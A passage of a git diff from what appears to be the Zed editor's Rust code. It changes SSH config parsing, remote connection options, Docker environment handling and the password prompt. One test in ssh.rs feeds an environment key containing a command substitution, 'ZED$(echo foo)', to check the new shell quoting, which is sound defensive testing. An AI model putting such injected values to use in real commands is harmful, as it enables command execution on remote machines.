Context>) -> Option { + let focus_handle = self.focus_handle.clone(); + + Some( + v_flex() + .p_1p5() + .flex_1() + .gap_1() + .border_t_1() + .border_color(cx.theme().colors().border_variant) + .child({ + let open_action = workspace::Open { + create_new_window: false, + }; + + Button::new("open_local_folder", "Add Local Project") + .key_binding(KeyBinding::for_action_in(&open_action, &focus_handle, cx)) + .on_click(cx.listener(move |_, _, window, cx| { + window.dispatch_action(open_action.boxed_clone(), cx); + cx.emit(DismissEvent); + })) + }) + .child( + Button::new("open_remote_folder", "Add Remote Project") + .key_binding(KeyBinding::for_action( + &OpenRemote { + from_existing_connection: false, + create_new_window: false, + }, + cx, + )) + .on_click(cx.listener(|_, _, window, cx| { + window.dispatch_action( + OpenRemote { + from_existing_connection: false, + 
create_new_window: false, + } + .boxed_clone(), + cx, + ); + cx.emit(DismissEvent); + })), + ) + .into_any(), + ) + } +} diff --git a/crates/recent_projects/src/ssh_config.rs b/crates/recent_projects/src/ssh_config.rs index f38181820553e2b2ae46f68761c7aea17caccd5d..6641c2df14d572d85591ed705f17f377682d58ee 100644 --- a/crates/recent_projects/src/ssh_config.rs +++ b/crates/recent_projects/src/ssh_config.rs @@ -1,60 +1,116 @@ use std::collections::BTreeSet; +const FILTERED_GIT_PROVIDER_HOSTNAMES: &[&str] = &[ + "dev.azure.com", + "bitbucket.org", + "chromium.googlesource.com", + "codeberg.org", + "gitea.com", + "gitee.com", + "github.com", + "gist.github.com", + "gitlab.com", + "sourcehut.org", + "git.sr.ht", +]; + pub fn parse_ssh_config_hosts(config: &str) -> BTreeSet { - let mut hosts = BTreeSet::new(); - let mut needs_another_line = false; + parse_host_blocks(config) + .into_iter() + .flat_map(HostBlock::non_git_provider_hosts) + .collect() +} + +struct HostBlock { + aliases: BTreeSet, + hostname: Option, +} + +impl HostBlock { + fn non_git_provider_hosts(self) -> impl Iterator { + let hostname = self.hostname; + let hostname_ref = hostname.as_deref().map(is_git_provider_domain); + self.aliases + .into_iter() + .filter(move |alias| !hostname_ref.unwrap_or_else(|| is_git_provider_domain(alias))) + } +} + +fn parse_host_blocks(config: &str) -> Vec { + let mut blocks = Vec::new(); + let mut aliases = BTreeSet::new(); + let mut hostname = None; + let mut needs_continuation = false; + for line in config.lines() { let line = line.trim_start(); - if let Some(line) = line.strip_prefix("Host") { - match line.chars().next() { - Some('\\') => { - needs_another_line = true; - } - Some('\n' | '\r') => { - needs_another_line = false; - } - Some(c) if c.is_whitespace() => { - parse_hosts_from(line, &mut hosts); - } - Some(_) | None => { - needs_another_line = false; - } - }; - - if needs_another_line { - parse_hosts_from(line, &mut hosts); - needs_another_line = 
line.trim_end().ends_with('\\'); - } else { - needs_another_line = false; + + if needs_continuation { + needs_continuation = line.trim_end().ends_with('\\'); + parse_hosts(line, &mut aliases); + continue; + } + + let Some((keyword, value)) = split_keyword_and_value(line) else { + continue; + }; + + if keyword.eq_ignore_ascii_case("host") { + if !aliases.is_empty() { + blocks.push(HostBlock { aliases, hostname }); + aliases = BTreeSet::new(); + hostname = None; } - } else if needs_another_line { - needs_another_line = line.trim_end().ends_with('\\'); - parse_hosts_from(line, &mut hosts); - } else { - needs_another_line = false; + parse_hosts(value, &mut aliases); + needs_continuation = line.trim_end().ends_with('\\'); + } else if keyword.eq_ignore_ascii_case("hostname") { + hostname = value.split_whitespace().next().map(ToOwned::to_owned); } } - hosts + if !aliases.is_empty() { + blocks.push(HostBlock { aliases, hostname }); + } + + blocks } -fn parse_hosts_from(line: &str, hosts: &mut BTreeSet) { +fn parse_hosts(line: &str, hosts: &mut BTreeSet) { hosts.extend( line.split_whitespace() + .map(|field| field.trim_end_matches('\\')) .filter(|field| !field.starts_with("!")) .filter(|field| !field.contains("*")) + .filter(|field| *field != "\\") .filter(|field| !field.is_empty()) .map(|field| field.to_owned()), ); } +fn split_keyword_and_value(line: &str) -> Option<(&str, &str)> { + let keyword_end = line.find(char::is_whitespace).unwrap_or(line.len()); + let keyword = &line[..keyword_end]; + if keyword.is_empty() { + return None; + } + + let value = line[keyword_end..].trim_start(); + Some((keyword, value)) +} + +fn is_git_provider_domain(host: &str) -> bool { + let host = host.to_ascii_lowercase(); + FILTERED_GIT_PROVIDER_HOSTNAMES.contains(&host.as_str()) +} + #[cfg(test)] mod tests { use super::*; + use indoc::indoc; #[test] fn test_thank_you_bjorn3() { - let hosts = " + let hosts = indoc! 
{" Host * AddKeysToAgent yes UseKeychain yes @@ -67,19 +123,20 @@ mod tests { User not_me Host something - HostName whatever.tld + HostName whatever.tld - Host linux bsd host3 - User bjorn + Host linux bsd host3 + User bjorn - Host rpi - user rpi - hostname rpi.local + Host rpi + user rpi + hostname rpi.local - Host \ - somehost \ - anotherhost - Hostname 192.168.3.3"; + Host \\ + somehost \\ + anotherhost + Hostname 192.168.3.3 + "}; let expected_hosts = BTreeSet::from_iter([ "something".to_owned(), @@ -93,4 +150,68 @@ mod tests { assert_eq!(expected_hosts, parse_ssh_config_hosts(hosts)); } + + #[test] + fn filters_git_provider_domains_from_hostname() { + let hosts = indoc! {" + Host github-personal + HostName github.com + + Host gitlab-work + HostName GITLAB.COM + + Host local + HostName example.com + "}; + + assert_eq!( + BTreeSet::from_iter(["local".to_owned()]), + parse_ssh_config_hosts(hosts) + ); + } + + #[test] + fn falls_back_to_host_when_hostname_is_absent() { + let hosts = indoc! {" + Host github.com bitbucket.org keep-me + User git + "}; + + assert_eq!( + BTreeSet::from_iter(["keep-me".to_owned()]), + parse_ssh_config_hosts(hosts) + ); + } + + #[test] + fn does_not_fuzzy_match_host_aliases() { + let hosts = indoc! {" + Host GitHub GitLab Bitbucket GITHUB github + User git + "}; + + assert_eq!( + BTreeSet::from_iter([ + "Bitbucket".to_owned(), + "GITHUB".to_owned(), + "GitHub".to_owned(), + "GitLab".to_owned(), + "github".to_owned(), + ]), + parse_ssh_config_hosts(hosts) + ); + } + + #[test] + fn uses_hostname_before_host_filtering() { + let hosts = indoc! 
{" + Host github.com keep-me + HostName example.com + "}; + + assert_eq!( + BTreeSet::from_iter(["github.com".to_owned(), "keep-me".to_owned()]), + parse_ssh_config_hosts(hosts) + ); + } } diff --git a/crates/recent_projects/src/wsl_picker.rs b/crates/recent_projects/src/wsl_picker.rs index 7f2a69eb68cb93742d98f438f75f74c95bf3f7d5..c53dd7c3fb68bc087216764536506f85117ffb36 100644 --- a/crates/recent_projects/src/wsl_picker.rs +++ b/crates/recent_projects/src/wsl_picker.rs @@ -235,9 +235,6 @@ impl WslOpenModal { cx: &mut Context, ) { let app_state = workspace::AppState::global(cx); - let Some(app_state) = app_state.upgrade() else { - return; - }; let connection_options = RemoteConnectionOptions::Wsl(WslConnectionOptions { distro_name: distro.to_string(), @@ -248,14 +245,16 @@ impl WslOpenModal { true => secondary, false => !secondary, }; - let replace_window = match replace_current_window { - true => window.window_handle().downcast::(), - false => None, + let open_mode = if replace_current_window { + workspace::OpenMode::Activate + } else { + workspace::OpenMode::NewWindow }; let paths = self.paths.clone(); let open_options = workspace::OpenOptions { - replace_window, + requesting_window: window.window_handle().downcast::(), + open_mode, ..Default::default() }; diff --git a/crates/remote/Cargo.toml b/crates/remote/Cargo.toml index 50026904a8f1ae9bf1954b8c41383487f59a001b..c08561954ebc0ba47a7bf1ab58092275161679a0 100644 --- a/crates/remote/Cargo.toml +++ b/crates/remote/Cargo.toml @@ -48,3 +48,4 @@ which.workspace = true [dev-dependencies] gpui = { workspace = true, features = ["test-support"] } fs = { workspace = true, features = ["test-support"] } +util = { workspace = true, features = ["test-support"] } diff --git a/crates/remote/src/remote_client.rs b/crates/remote/src/remote_client.rs index f31fc9ebec028b6a42a7cbc0d61cf9574a4a0f3c..c04d3630f92bcc27afb01a619176d3ae79d3fac7 100644 --- a/crates/remote/src/remote_client.rs +++ b/crates/remote/src/remote_client.rs @@ 
-1273,7 +1273,7 @@ impl ConnectionPool { } } -#[derive(Debug, Clone, PartialEq, Eq, Hash)] +#[derive(Debug, Clone, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize)] pub enum RemoteConnectionOptions { Ssh(SshConnectionOptions), Wsl(WslConnectionOptions), @@ -1285,7 +1285,10 @@ pub enum RemoteConnectionOptions { impl RemoteConnectionOptions { pub fn display_name(&self) -> String { match self { - RemoteConnectionOptions::Ssh(opts) => opts.host.to_string(), + RemoteConnectionOptions::Ssh(opts) => opts + .nickname + .clone() + .unwrap_or_else(|| opts.host.to_string()), RemoteConnectionOptions::Wsl(opts) => opts.distro_name.clone(), RemoteConnectionOptions::Docker(opts) => { if opts.use_podman { @@ -1300,6 +1303,32 @@ impl RemoteConnectionOptions { } } +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_ssh_display_name_prefers_nickname() { + let options = RemoteConnectionOptions::Ssh(SshConnectionOptions { + host: "1.2.3.4".into(), + nickname: Some("My Cool Project".to_string()), + ..Default::default() + }); + + assert_eq!(options.display_name(), "My Cool Project"); + } + + #[test] + fn test_ssh_display_name_falls_back_to_host() { + let options = RemoteConnectionOptions::Ssh(SshConnectionOptions { + host: "1.2.3.4".into(), + ..Default::default() + }); + + assert_eq!(options.display_name(), "1.2.3.4"); + } +} + impl From for RemoteConnectionOptions { fn from(opts: SshConnectionOptions) -> Self { RemoteConnectionOptions::Ssh(opts) diff --git a/crates/remote/src/transport.rs b/crates/remote/src/transport.rs index 09bb22ddbe2b303b767255fd7ab02b54d9b17b2f..8d0f212cfc4f9544d0a827a41aefc3a8af07ee72 100644 --- a/crates/remote/src/transport.rs +++ b/crates/remote/src/transport.rs @@ -1,3 +1,5 @@ +use std::io::Write; + use crate::{ RemoteArch, RemoteOs, RemotePlatform, json_log::LogRecord, @@ -137,7 +139,12 @@ fn handle_rpc_messages_over_child_process_stdio( if let Ok(record) = serde_json::from_slice::(content) { record.log(log::logger()) } else { - 
eprintln!("(remote) {}", String::from_utf8_lossy(content)); + std::io::stderr() + .write_fmt(format_args!( + "(remote) {}\n", + String::from_utf8_lossy(content) + )) + .ok(); } } stderr_buffer.drain(0..start_ix); diff --git a/crates/remote/src/transport/docker.rs b/crates/remote/src/transport/docker.rs index 1bcf80880ab17ddea63bd56fb54acfddc48db2dd..6322cd9193d383cfcd3e9ff5cb93670bcd136023 100644 --- a/crates/remote/src/transport/docker.rs +++ b/crates/remote/src/transport/docker.rs @@ -6,6 +6,7 @@ use collections::HashMap; use parking_lot::Mutex; use release_channel::{AppCommitSha, AppVersion, ReleaseChannel}; use semver::Version as SemanticVersion; +use std::collections::BTreeMap; use std::time::Instant; use std::{ path::{Path, PathBuf}, @@ -29,13 +30,25 @@ use crate::{ transport::parse_platform, }; -#[derive(Debug, Default, Clone, PartialEq, Eq, Hash)] +#[derive( + Debug, + Default, + Clone, + PartialEq, + Eq, + Hash, + PartialOrd, + Ord, + serde::Serialize, + serde::Deserialize, +)] pub struct DockerConnectionOptions { pub name: String, pub container_id: String, pub remote_user: String, pub upload_binary_over_docker_exec: bool, pub use_podman: bool, + pub remote_env: BTreeMap, } pub(crate) struct DockerExecConnection { @@ -499,10 +512,14 @@ impl DockerExecConnection { args.push("-u".to_string()); args.push(self.connection_options.remote_user.clone()); + for (k, v) in self.connection_options.remote_env.iter() { + args.push("-e".to_string()); + args.push(format!("{k}={v}")); + } + for (k, v) in env.iter() { args.push("-e".to_string()); - let env_declaration = format!("{}={}", k, v); - args.push(env_declaration); + args.push(format!("{k}={v}")); } args.push(self.connection_options.container_id.clone()); @@ -632,10 +649,15 @@ impl RemoteConnection for DockerExecConnection { }; let mut docker_args = vec!["exec".to_string()]; + + for (k, v) in self.connection_options.remote_env.iter() { + docker_args.push("-e".to_string()); + docker_args.push(format!("{k}={v}")); + } 
for env_var in ["RUST_LOG", "RUST_BACKTRACE", "ZED_GENERATE_MINIDUMPS"] { if let Some(value) = std::env::var(env_var).ok() { docker_args.push("-e".to_string()); - docker_args.push(format!("{}='{}'", env_var, value)); + docker_args.push(format!("{env_var}={value}")); } } @@ -768,9 +790,14 @@ impl RemoteConnection for DockerExecConnection { docker_args.push(parsed_working_dir); } + for (k, v) in self.connection_options.remote_env.iter() { + docker_args.push("-e".to_string()); + docker_args.push(format!("{k}={v}")); + } + for (k, v) in env.iter() { docker_args.push("-e".to_string()); - docker_args.push(format!("{}={}", k, v)); + docker_args.push(format!("{k}={v}")); } match interactive { diff --git a/crates/remote/src/transport/mock.rs b/crates/remote/src/transport/mock.rs index 06e13196583fef9743e3f337bfe9cd9acf0efbca..f567d24eb122f72b4dbb79cdeb2c98c744f02da4 100644 --- a/crates/remote/src/transport/mock.rs +++ b/crates/remote/src/transport/mock.rs @@ -56,7 +56,7 @@ use std::{ use util::paths::{PathStyle, RemotePathBuf}; /// Unique identifier for a mock connection. 
-#[derive(Debug, Clone, PartialEq, Eq, Hash)] +#[derive(Debug, Clone, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize)] pub struct MockConnectionOptions { pub id: u64, } diff --git a/crates/remote/src/transport/ssh.rs b/crates/remote/src/transport/ssh.rs index d27662dde3656de1e2434273bee554a168198371..1884ea43b6492efba91623eb1ab4c5a1ed4d3de1 100644 --- a/crates/remote/src/transport/ssh.rs +++ b/crates/remote/src/transport/ssh.rs @@ -45,7 +45,7 @@ pub(crate) struct SshRemoteConnection { _temp_dir: TempDir, } -#[derive(Debug, Clone, PartialEq, Eq, Hash)] +#[derive(Debug, Clone, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize)] pub enum SshConnectionHost { IpAddr(IpAddr), Hostname(String), @@ -102,7 +102,7 @@ fn bracket_ipv6(host: &str) -> String { } } -#[derive(Debug, Default, Clone, PartialEq, Eq, Hash)] +#[derive(Debug, Default, Clone, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize)] pub struct SshConnectionOptions { pub host: SshConnectionHost, pub username: Option, @@ -463,7 +463,7 @@ impl RemoteConnection for SshRemoteConnection { let mut proxy_args = vec![]; for env_var in VARS { if let Some(value) = std::env::var(env_var).ok() { - proxy_args.push(format!("{}='{}'", env_var, value)); + proxy_args.push(format!("{env_var}={value}")); } } proxy_args.push(remote_binary_path.display(self.path_style()).into_owned()); @@ -1666,12 +1666,11 @@ fn build_command_posix( write!(exec, "exec env ")?; for (k, v) in input_env.iter() { - write!( - exec, - "{}={} ", - k, - ssh_shell_kind.try_quote(v).context("shell quoting")? 
- )?; + let assignment = format!("{k}={v}"); + let assignment = ssh_shell_kind + .try_quote(&assignment) + .context("shell quoting")?; + write!(exec, "{assignment} ")?; } if let Some(input_program) = input_program { @@ -1882,7 +1881,7 @@ mod tests { "-q", "-t", "user@host", - "cd \"$HOME/work\" && exec env INPUT_VA=val remote_program arg1 arg2" + "cd \"$HOME/work\" && exec env 'INPUT_VA=val' remote_program arg1 arg2" ] ); assert_eq!(command.env, env); @@ -1918,7 +1917,7 @@ mod tests { "-q", "-t", "user@host", - "cd && exec env INPUT_VA=val /bin/fish -l" + "cd && exec env 'INPUT_VA=val' /bin/fish -l" ] ); assert_eq!(command.env, env); @@ -1926,6 +1925,38 @@ mod tests { Ok(()) } + #[test] + fn test_build_command_quotes_env_assignment() -> Result<()> { + let mut input_env = HashMap::default(); + input_env.insert("ZED$(echo foo)".to_string(), "value".to_string()); + + let command = build_command_posix( + Some("remote_program".to_string()), + &[], + &input_env, + None, + None, + HashMap::default(), + PathStyle::Posix, + "/bin/bash", + ShellKind::Posix, + vec![], + "user@host", + Interactive::No, + )?; + + let remote_command = command + .args + .last() + .context("missing remote command argument")?; + assert!( + remote_command.contains("exec env 'ZED$(echo foo)=value' remote_program"), + "expected env assignment to be quoted, got: {remote_command}" + ); + + Ok(()) + } + #[test] fn scp_args_exclude_port_forward_flags() { let options = SshConnectionOptions { diff --git a/crates/remote/src/transport/wsl.rs b/crates/remote/src/transport/wsl.rs index 2eb2aea59abdbe24a3dae168d4399aaa59a9c6e3..1bbbaca2235c0bcf14c414a9419ab9dd92b4e814 100644 --- a/crates/remote/src/transport/wsl.rs +++ b/crates/remote/src/transport/wsl.rs @@ -28,7 +28,9 @@ use util::{ shell_builder::ShellBuilder, }; -#[derive(Debug, Clone, PartialEq, Eq, Hash, serde::Deserialize, schemars::JsonSchema)] +#[derive( + Debug, Clone, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize, schemars::JsonSchema, +)] 
pub struct WslConnectionOptions { pub distro_name: String, pub user: Option, @@ -450,13 +452,10 @@ impl RemoteConnection for WslRemoteConnection { let mut exec = String::from("exec env "); - for (k, v) in env.iter() { - write!( - exec, - "{}={} ", - k, - shell_kind.try_quote(v).context("shell quoting")? - )?; + for (key, value) in env.iter() { + let assignment = format!("{key}={value}"); + let assignment = shell_kind.try_quote(&assignment).context("shell quoting")?; + write!(exec, "{assignment} ")?; } if let Some(program) = program { diff --git a/crates/remote_connection/Cargo.toml b/crates/remote_connection/Cargo.toml index 53e20eb5eb0708252a90819d37b38e214aa95d67..d3b37f6985bb0b47a1a1902fc5a856c2df974a60 100644 --- a/crates/remote_connection/Cargo.toml +++ b/crates/remote_connection/Cargo.toml @@ -28,7 +28,7 @@ release_channel.workspace = true remote.workspace = true semver.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true ui_input.workspace = true workspace.workspace = true \ No newline at end of file diff --git a/crates/remote_connection/src/remote_connection.rs b/crates/remote_connection/src/remote_connection.rs index d4df85d7b94b52c6f6bef0f052e515797b4f79c3..df6260d1c5b3cd1704bfe0ce6a8476bbc0f39670 100644 --- a/crates/remote_connection/src/remote_connection.rs +++ b/crates/remote_connection/src/remote_connection.rs @@ -13,10 +13,10 @@ use release_channel::ReleaseChannel; use remote::{ConnectionIdentifier, RemoteClient, RemoteConnectionOptions, RemotePlatform}; use semver::Version; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ - ActiveTheme, Color, CommonAnimationExt, Context, InteractiveElement, IntoElement, KeyBinding, - LabelCommon, ListItem, Styled, Window, prelude::*, + ActiveTheme, CommonAnimationExt, Context, InteractiveElement, KeyBinding, ListItem, Tooltip, + prelude::*, }; use ui_input::{ERASED_EDITOR_FACTORY, ErasedEditor}; use 
workspace::{DismissDecision, ModalView}; @@ -30,6 +30,8 @@ pub struct RemoteConnectionPrompt { prompt: Option<(Entity, oneshot::Sender)>, cancellation: Option>, editor: Arc, + is_password_prompt: bool, + is_masked: bool, } impl Drop for RemoteConnectionPrompt { @@ -70,6 +72,8 @@ impl RemoteConnectionPrompt { status_message: None, cancellation: None, prompt: None, + is_password_prompt: false, + is_masked: true, } } @@ -85,7 +89,9 @@ impl RemoteConnectionPrompt { cx: &mut Context, ) { let is_yes_no = prompt.contains("yes/no"); - self.editor.set_masked(!is_yes_no, window, cx); + self.is_password_prompt = !is_yes_no; + self.is_masked = !is_yes_no; + self.editor.set_masked(self.is_masked, window, cx); let markdown = cx.new(|cx| Markdown::new_text(prompt.into(), cx)); self.prompt = Some((markdown, tx)); @@ -133,40 +139,87 @@ impl Render for RemoteConnectionPrompt { ..Default::default() }; + let is_password_prompt = self.is_password_prompt; + let is_masked = self.is_masked; + let (masked_password_icon, masked_password_tooltip) = if is_masked { + (IconName::Eye, "Toggle to Unmask Password") + } else { + (IconName::EyeOff, "Toggle to Mask Password") + }; + v_flex() .key_context("PasswordPrompt") .p_2() .size_full() - .text_buffer(cx) - .when_some(self.status_message.clone(), |el, status_message| { - el.child( + .when_some(self.prompt.as_ref(), |this, prompt| { + this.child( + v_flex() + .text_sm() + .size_full() + .overflow_hidden() + .child( + h_flex() + .w_full() + .justify_between() + .child(MarkdownElement::new(prompt.0.clone(), markdown_style)) + .when(is_password_prompt, |this| { + this.child( + IconButton::new("toggle_mask", masked_password_icon) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text(masked_password_tooltip)) + .on_click(cx.listener(|this, _, window, cx| { + this.is_masked = !this.is_masked; + this.editor.set_masked(this.is_masked, window, cx); + window.focus(&this.editor.focus_handle(cx), cx); + cx.notify(); + })), + ) + }), + ) + 
.child(div().flex_1().child(self.editor.render(window, cx))), + ) + .when(window.capslock().on, |this| { + this.child( + h_flex() + .py_0p5() + .min_w_0() + .w_full() + .gap_1() + .child( + Icon::new(IconName::Warning) + .size(IconSize::Small) + .color(Color::Muted), + ) + .child( + Label::new("Caps lock is on.") + .size(LabelSize::Small) + .color(Color::Muted), + ), + ) + }) + }) + .when_some(self.status_message.clone(), |this, status_message| { + this.child( h_flex() - .gap_2() + .min_w_0() + .w_full() + .mt_1() + .gap_1() .child( - Icon::new(IconName::ArrowCircle) + Icon::new(IconName::LoadCircle) + .size(IconSize::Small) .color(Color::Muted) .with_rotate_animation(2), ) .child( - div() - .text_ellipsis() - .overflow_x_hidden() - .child(format!("{}…", status_message)), + Label::new(format!("{}…", status_message)) + .size(LabelSize::Small) + .color(Color::Muted) + .truncate() + .flex_1(), ), ) }) - .when_some(self.prompt.as_ref(), |el, prompt| { - el.child( - div() - .size_full() - .overflow_hidden() - .child(MarkdownElement::new(prompt.0.clone(), markdown_style)) - .child(self.editor.render(window, cx)), - ) - .when(window.capslock().on, |el| { - el.child(Label::new("⚠️ ⇪ is on")) - }) - }) } } diff --git a/crates/remote_server/Cargo.toml b/crates/remote_server/Cargo.toml index ee729a80eaa9eff56eee7f3bcb8fe6eaf31f0c41..c6ce45ba1ce28386d0776eb40299919f92aa8e53 100644 --- a/crates/remote_server/Cargo.toml +++ b/crates/remote_server/Cargo.toml @@ -89,9 +89,7 @@ action_log.workspace = true agent = { workspace = true, features = ["test-support"] } client = { workspace = true, features = ["test-support"] } clock = { workspace = true, features = ["test-support"] } -dap = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } -workspace = { workspace = true, features = ["test-support"] } fs = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } http_client = { 
workspace = true, features = ["test-support"] } @@ -100,10 +98,10 @@ node_runtime = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true project = { workspace = true, features = ["test-support"] } remote = { workspace = true, features = ["test-support"] } +theme_settings.workspace = true theme = { workspace = true, features = ["test-support"] } language_model = { workspace = true, features = ["test-support"] } lsp = { workspace = true, features = ["test-support"] } -prompt_store.workspace = true unindent.workspace = true serde_json.workspace = true zlog.workspace = true diff --git a/crates/remote_server/src/headless_project.rs b/crates/remote_server/src/headless_project.rs index ac6be6d413c08a73b1aa872b1f5acef6931d9c12..7bdbbad796bd2ced34ed7ccab690555457a0842b 100644 --- a/crates/remote_server/src/headless_project.rs +++ b/crates/remote_server/src/headless_project.rs @@ -129,7 +129,6 @@ impl HeadlessProject { worktree_store.clone(), environment.clone(), manifest_tree.clone(), - fs.clone(), cx, ) }); @@ -192,6 +191,7 @@ impl HeadlessProject { worktree_store.clone(), toolchain_store.read(cx).as_language_toolchain_store(), environment.clone(), + git_store.clone(), cx, ); task_store.shared(REMOTE_SERVER_PROJECT_ID, session.clone(), cx); diff --git a/crates/remote_server/src/remote_editing_tests.rs b/crates/remote_server/src/remote_editing_tests.rs index 778f7292d2a032df6995169852deeecee6fa76a7..f0f23577d31075ab815d6dba1cdbdccd275c184a 100644 --- a/crates/remote_server/src/remote_editing_tests.rs +++ b/crates/remote_server/src/remote_editing_tests.rs @@ -2,23 +2,21 @@ /// The tests in this file assume that server_cx is running on Windows too. /// We neead to find a way to test Windows-Non-Windows interactions. 
use crate::headless_project::HeadlessProject; -use agent::{ - AgentTool, ReadFileTool, ReadFileToolInput, Templates, Thread, ToolCallEventStream, ToolInput, -}; +use agent::{AgentTool, ReadFileTool, ReadFileToolInput, ToolCallEventStream, ToolInput}; use client::{Client, UserStore}; use clock::FakeSystemClock; use collections::{HashMap, HashSet}; -use git::repository::DiffType; -use language_model::{LanguageModelToolResultContent, fake_provider::FakeLanguageModel}; -use prompt_store::ProjectContext; +use language_model::LanguageModelToolResultContent; +use languages::rust_lang; use extension::ExtensionHostProxy; use fs::{FakeFs, Fs}; +use git::repository::Worktree as GitWorktree; use gpui::{AppContext as _, Entity, SharedString, TestAppContext}; use http_client::{BlockedHttpClient, FakeHttpClient}; use language::{ Buffer, FakeLspAdapter, LanguageConfig, LanguageMatcher, LanguageRegistry, LineEnding, - language_settings::{AllLanguageSettings, language_settings}, + language_settings::{AllLanguageSettings, LanguageSettings}, }; use lsp::{ CompletionContext, CompletionResponse, CompletionTriggerKind, DEFAULT_LSP_REQUEST_TIMEOUT, @@ -485,6 +483,7 @@ async fn test_remote_settings(cx: &mut TestAppContext, server_cx: &mut TestAppCo let worktree_id = project .update(cx, |project, cx| { + project.languages().add(rust_lang()); project.find_or_create_worktree("/code/project1", true, cx) }) .await @@ -525,9 +524,8 @@ async fn test_remote_settings(cx: &mut TestAppContext, server_cx: &mut TestAppCo }); cx.read(|cx| { - let file = buffer.read(cx).file(); assert_eq!( - language_settings(Some("Rust".into()), file, cx).language_servers, + LanguageSettings::for_buffer(buffer.read(cx), cx).language_servers, ["override-rust-analyzer".to_string()] ) }); @@ -650,6 +648,7 @@ async fn test_remote_lsp(cx: &mut TestAppContext, server_cx: &mut TestAppContext let worktree_id = project .update(cx, |project, cx| { + project.languages().add(rust_lang()); 
project.find_or_create_worktree(path!("/code/project1"), true, cx) }) .await @@ -672,9 +671,8 @@ async fn test_remote_lsp(cx: &mut TestAppContext, server_cx: &mut TestAppContext let fake_second_lsp = fake_second_lsp.next().await.unwrap(); cx.read(|cx| { - let file = buffer.read(cx).file(); assert_eq!( - language_settings(Some("Rust".into()), file, cx).language_servers, + LanguageSettings::for_buffer(buffer.read(cx), cx).language_servers, ["rust-analyzer".to_string(), "fake-analyzer".to_string()] ) }); @@ -1542,6 +1540,87 @@ async fn test_copy_file_into_remote_project( ); } +#[gpui::test] +async fn test_remote_root_repo_common_dir(cx: &mut TestAppContext, server_cx: &mut TestAppContext) { + let fs = FakeFs::new(server_cx.executor()); + fs.insert_tree( + "/code", + json!({ + "main_repo": { + ".git": {}, + "file.txt": "content", + }, + "no_git": { + "file.txt": "content", + }, + }), + ) + .await; + + // Create a linked worktree that points back to main_repo's .git. + fs.add_linked_worktree_for_repo( + Path::new("/code/main_repo/.git"), + false, + GitWorktree { + path: PathBuf::from("/code/linked_worktree"), + ref_name: Some("refs/heads/feature-branch".into()), + sha: "abc123".into(), + is_main: false, + }, + ) + .await; + + let (project, _headless) = init_test(&fs, cx, server_cx).await; + + // Main repo: root_repo_common_dir should be the .git directory itself. + let (worktree_main, _) = project + .update(cx, |project, cx| { + project.find_or_create_worktree("/code/main_repo", true, cx) + }) + .await + .unwrap(); + cx.executor().run_until_parked(); + + let common_dir = worktree_main.read_with(cx, |worktree, _| { + worktree.snapshot().root_repo_common_dir().cloned() + }); + assert_eq!( + common_dir.as_deref(), + Some(Path::new("/code/main_repo/.git")), + ); + + // Linked worktree: root_repo_common_dir should point to the main repo's .git. 
+ let (worktree_linked, _) = project + .update(cx, |project, cx| { + project.find_or_create_worktree("/code/linked_worktree", true, cx) + }) + .await + .unwrap(); + cx.executor().run_until_parked(); + + let common_dir = worktree_linked.read_with(cx, |worktree, _| { + worktree.snapshot().root_repo_common_dir().cloned() + }); + assert_eq!( + common_dir.as_deref(), + Some(Path::new("/code/main_repo/.git")), + ); + + // No git repo: root_repo_common_dir should be None. + let (worktree_no_git, _) = project + .update(cx, |project, cx| { + project.find_or_create_worktree("/code/no_git", true, cx) + }) + .await + .unwrap(); + cx.executor().run_until_parked(); + + let common_dir = worktree_no_git.read_with(cx, |worktree, _| { + worktree.snapshot().root_repo_common_dir().cloned() + }); + assert_eq!(common_dir, None); +} + #[gpui::test] async fn test_remote_git_diffs(cx: &mut TestAppContext, server_cx: &mut TestAppContext) { let text_2 = " @@ -1664,7 +1743,7 @@ async fn test_remote_git_diffs_when_recv_update_repository_delay( cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); release_channel::init(semver::Version::new(0, 0, 0), cx); editor::init(cx); }); @@ -1921,44 +2000,21 @@ async fn test_remote_git_branches(cx: &mut TestAppContext, server_cx: &mut TestA } #[gpui::test] -async fn test_remote_git_diff_stat(cx: &mut TestAppContext, server_cx: &mut TestAppContext) { +async fn test_remote_git_checkpoints(cx: &mut TestAppContext, server_cx: &mut TestAppContext) { let fs = FakeFs::new(server_cx.executor()); fs.insert_tree( path!("/code"), json!({ "project1": { ".git": {}, - "src": { - "lib.rs": "line1\nline2\nline3\n", - "new_file.rs": "added1\nadded2\n", - }, - "README.md": "# project 1", + "file.txt": "original content", }, }), ) .await; - let dot_git = Path::new(path!("/code/project1/.git")); - - // HEAD: lib.rs (2 lines), 
deleted.rs (1 line) - fs.set_head_for_repo( - dot_git, - &[ - ("src/lib.rs", "line1\nold_line2\n".into()), - ("src/deleted.rs", "was_here\n".into()), - ], - "deadbeef", - ); - // Index: lib.rs modified (4 lines), staged_only.rs new (2 lines) - fs.set_index_for_repo( - dot_git, - &[ - ("src/lib.rs", "line1\nold_line2\nline3\nline4\n".into()), - ("src/staged_only.rs", "x\ny\n".into()), - ], - ); - let (project, _headless) = init_test(&fs, cx, server_cx).await; + let (_worktree, _) = project .update(cx, |project, cx| { project.find_or_create_worktree(path!("/code/project1"), true, cx) @@ -1967,80 +2023,127 @@ async fn test_remote_git_diff_stat(cx: &mut TestAppContext, server_cx: &mut Test .unwrap(); cx.run_until_parked(); - let repo_path = |s: &str| git::repository::RepoPath::new(s).unwrap(); - let repository = project.update(cx, |project, cx| project.active_repository(cx).unwrap()); - // --- HeadToWorktree --- - let stats = cx - .update(|cx| repository.update(cx, |repo, cx| repo.diff_stat(DiffType::HeadToWorktree, cx))) + // 1. Create a checkpoint of the original state + let checkpoint_1 = 